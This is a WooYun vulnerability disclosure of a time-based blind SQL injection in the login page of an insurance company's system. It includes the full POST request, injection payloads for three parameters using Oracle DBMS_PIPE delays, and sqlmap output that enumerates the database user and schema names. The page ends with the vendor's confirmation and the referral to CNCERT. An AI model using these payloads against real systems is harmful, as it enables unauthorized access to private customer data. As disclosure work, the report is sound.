当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0157014

漏洞标题:新光海航人寿某重要系统post注入(Oracle)

相关厂商:新光海航人寿

漏洞作者: 路人甲

提交时间:2015-12-04 17:40

修复时间:2016-01-18 11:32

公开时间:2016-01-18 11:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-04: 细节已通知厂商并且等待厂商处理中
2015-12-08: 厂商已经确认,细节仅向厂商公开
2015-12-18: 细节向核心白帽子及相关领域专家公开
2015-12-28: 细节向普通白帽子公开
2016-01-07: 细节向实习白帽子公开
2016-01-18: 细节向公众公开

简要描述:

详细说明:

地址:

http://**.**.**.**:8088/SKLSUG/indexlis.jsp


时间盲注post包

POST /SKLSUG/fromLogin/fromLoginSave.jsp HTTP/1.1
Host: **.**.**.**:8088
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://**.**.**.**:8088/SKLSUG/fromLogin/manageLogin.jsp
Cookie: JSESSIONID=782FF9898F583F1E49892D45CE9E0088
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 91
channel=I&usertype=1&managecom=00603&subcom=&supportcom=0060301&usercode=test&password=test


数据

Place: POST
Parameter: usercode
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: channel=I&usertype=1&managecom=124124&subcom=&supportcom=1234134124
&usercode=admin' AND 6285=DBMS_PIPE.RECEIVE_MESSAGE(CHR(112)||CHR(78)||CHR(68)||
CHR(100),5) AND 'JBBc'='JBBc&password=admin
Place: POST
Parameter: supportcom
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: channel=I&usertype=1&managecom=124124&subcom=&supportcom=1234134124
' AND 7417=DBMS_PIPE.RECEIVE_MESSAGE(CHR(106)||CHR(120)||CHR(122)||CHR(121),5) A
ND 'JCVP'='JCVP&usercode=admin&password=admin
Place: POST
Parameter: usertype
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: channel=I&usertype=1' AND 8434=DBMS_PIPE.RECEIVE_MESSAGE(CHR(80)||C
HR(75)||CHR(102)||CHR(87),5) AND 'NPme'='NPme&managecom=124124&subcom=&supportco
m=1234134124&usercode=admin&password=admin
---
there were multiple injection points, please select the one to use for following
 injections:
[0] place: POST, parameter: usertype, type: Single quoted string (default)
[1] place: POST, parameter: supportcom, type: Single quoted string
[2] place: POST, parameter: usercode, type: Single quoted string
[q] Quit
>
[11:52:26] [INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle
[11:52:26] [INFO] fetching current user
[11:52:26] [INFO] retrieved:
[11:52:26] [WARNING] it is very important not to stress the network adapter's ba
ndwidth during usage of time-based queries
SK
[11:53:09] [INFO] adjusting time delay to 3 seconds due to good response times
L
[11:53:21] [INFO] adjusting time delay to 2 seconds due to good response times
SUGPROD
current user:    'SKLSUGPROD'


available databases [1]:
[*] SKLSUGPROD


20多个表 本来想跑用户的 结果太慢了 跑了一个多小时

[11:57:32] [INFO] adjusting time delay to 2 seconds due to
20
[11:57:37] [INFO] retrieved: CF
[11:58:06] [INFO] retrieved: CTXSYS
[11:59:35] [INFO] retrieved: DBS
[12:00:25] [ERROR] invalid character detected. retrying..
[12:00:25] [WARNING] increasing time delay to 3 seconds
[12:00:46] [ERROR] invalid character detected. retrying..
[12:00:46] [WARNING] increasing time delay to 4 seconds
[12:01:03] [ERROR] invalid character detected. retrying..
[12:01:03] [WARNING] increasing time delay to 5 seconds
N
[12:02:00] [ERROR] invalid character detected. retrying..
[12:02:00] [WARNING] increasing time delay to 6 seconds
M
[12:02:46] [ERROR] invalid character detected. retrying..
[12:02:46] [WARNING] increasing time delay to 7 seconds
[12:03:09] [ERROR] unable to properly validate last charact
a
[12:03:14] [INFO] retrieved: DMSYS
[12:04:18] [INFO] retrieved: ECDEV
[12:05:19] [INFO] retrieved:
[12:05:30] [ERROR] invalid character detected. retrying..
[12:05:30] [WARNING] increasing time delay to 3 seconds
[12:05:45] [ERROR] invalid character detected. retrying..
[12:05:45] [WARNING] increasing time delay to 4 seconds
[12:06:03] [ERROR] invalid character detected. retrying..
[12:06:03] [WARNING] increasing time delay to 5 seconds
EXFSYS
[12:08:42] [INFO] retrieved: MDS
[12:10:11] [ERROR] invalid character detected. retrying..
[12:10:11] [WARNING] increasing time delay to 6 seconds
YS
[12:11:10] [INFO] retrieved: OLAPSYS
[12:14:22] [INFO] retrieved: ORDSYS
[12:16:59] [INFO] retrieved: OUTLN
[12:19:29] [INFO] retrieved: SCOT
[12:21:43] [ERROR] invalid character detected. retrying..
[12:21:43] [WARNING] increasing time delay to 7 seconds
T
[12:22:34] [INFO] retrieved: S
[12:23:34] [ERROR] unable to properly validate last charact
QLSU


才跑到这里

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-12-08 12:38

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向保险行业信息化主管部门通报,由其后续协调网站管理单位处置.

最新状态:

暂无